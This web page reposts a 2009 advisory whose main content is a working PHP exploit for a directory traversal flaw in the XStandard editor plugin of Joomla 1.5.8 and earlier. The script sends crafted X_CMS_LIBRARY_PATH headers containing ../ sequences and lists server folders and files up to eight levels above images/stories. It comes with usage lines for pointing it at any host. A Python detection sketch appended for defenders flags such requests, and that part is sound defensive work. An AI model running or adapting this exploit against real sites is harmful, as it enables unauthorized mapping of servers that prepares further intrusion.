Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability
Source: irk4z[at]yahoo.pl  Author: irk4z  Published: 2009-01-07
<?php
/*
Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vulnerability

discovered by: irk4z[at]yahoo.pl
greets: all friends ;)
*/

echo "* Joomla <= 1.5.8 (xstandard editor) Local Directory Traversal Vuln\n";
echo "* discovered by: irk4z[at]yahoo.pl\n";
echo "*\n";
echo "* greets: all friends ;) enjoy!\n";
echo "*------------------------------------------------------------------*\n";

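// Command-line arguments; missing ones default to '' so the usage check below runs cleanly.
$host = isset($argv[1]) ? $argv[1] : '';
$path = isset($argv[2]) ? $argv[2] : '';
$folder = isset($argv[3]) ? $argv[3] : '';

if (empty($host) || empty($path)) {
    echo "usage: php {$argv[0]} <host> <path> [<folder>]\n";
    echo "       php {$argv[0]} example.org /joomla\n";
    echo "       php {$argv[0]} example.org /joomla ../../\n";
    exit;
}

echo "http://" . $host . $path . "/images/stories/\n\n";

if ( empty($folder) ){
    // No folder given: list ./, ./../, ./../../ and so on, relative to images/stories/.
    $lev = "./";
    for( $i = 0; $i <= 7; $i++ ) {
        echo browseFolder($host, $path, $lev);
        $lev .= "../";
    }
} else {
    echo browseFolder($host, $path, $folder);
}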

function browseFolder($host, $path, $folder){

    // The folder to list is sent in the X_CMS_LIBRARY_PATH request header.
    $packet = "GET {$path}/plugins/editors/xstandard/attachmentlibrary.php HTTP/1.1\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "X_CMS_LIBRARY_PATH: {$folder}\r\n";
    $packet .= "Connection: Close\r\n\r\n";

    $o = @fsockopen($host, 80);
    if(!$o){
        echo "\n[x] No response...\n";
        die;
    }

    fputs($o, $packet);
    // Initialise the buffer before appending to it.
    $data = '';
    while (!feof($o)) $data .= fread($o, 1024);
    fclose($o);

    $_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
    if ( !empty($_404) ){
        echo "\n[x] 404 Not Found... Maybe wrong path? \n";
        die;
    }

    //folders
    preg_match_all("/<baseURL>([^<]+)<\/baseURL>/", $data, $matches);
    //files
    preg_match_all("/<value>([^<]+\.[^<]{3,4})<\/value>/", $data, $matches2);

    $matches = array_merge( $matches[1], $matches2[1] );

    if ( empty($matches) ){
        $ret = "$folder [x] Failed...\n";
    } else {
        $ret = '';
        // Normalise the returned paths and strip the images/stories/ prefix.
        foreach( $matches as $tmp){
            $ret .= str_replace("images/stories/", '', str_replace("/./", "/", str_replace("//", "/", urldecode($tmp) ) ) ) . "\n";
        }
    }

    return ($ret);
}

?>
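
For defenders, an added detection sketch (not part of the original advisory and not Joomla or XStandard code): it parses captured raw HTTP requests and flags those sent to attachmentlibrary.php whose X_CMS_LIBRARY_PATH value is absolute or climbs above the directory it starts in. The function names, the example.org host and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Endpoint and header name exactly as they appear in the request on this page.
ENDPOINT = "/plugins/editors/xstandard/attachmentlibrary.php"
HEADER = "x_cms_library_path"

def parse_request(raw):
    """Split a raw HTTP/1.x request into (path, {normalised header name: value})."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    parts = lines[0].split(" ")
    path = parts[1].split("?", 1)[0] if len(parts) >= 2 else ""
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            # Compare names case-insensitively with '-' and '_' folded together,
            # the way CGI-style environments expose them to PHP.
            headers[name.strip().lower().replace("-", "_")] = value.strip()
    return path, headers

def escapes_base(folder):
    """True if the value is absolute or climbs above the directory it starts in."""
    value = unquote(folder).replace("\\", "/")
    if value.startswith("/") or re.match(r"[A-Za-z]:", value):
        return True
    depth = 0
    for segment in value.split("/"):
        if segment in ("", "."):
            continue
        depth += -1 if segment == ".." else 1
        if depth < 0:
            return True
    return False

def is_suspicious(raw):
    """Flag attachment-library requests whose folder header leaves the media root."""
    path, headers = parse_request(raw)
    if not path.lower().endswith(ENDPOINT):
        return False
    return escapes_base(headers.get(HEADER, ""))

def sample(folder, name="X_CMS_LIBRARY_PATH"):
    """Constructed request in the shape shown on this page (host is a placeholder)."""
    return (f"GET /joomla{ENDPOINT} HTTP/1.1\r\nHost: example.org\r\n"
            f"{name}: {folder}\r\nConnection: Close\r\n\r\n")

if __name__ == "__main__":
    for folder in ("./", "photos/../", "./../", "../../", "%2e%2e/"):
        print(f"{folder!r:14} suspicious={is_suspicious(sample(folder))}")
```

Request headers are rarely written to standard access logs, so this check needs a source that records them, such as a reverse-proxy or WAF capture.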

 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved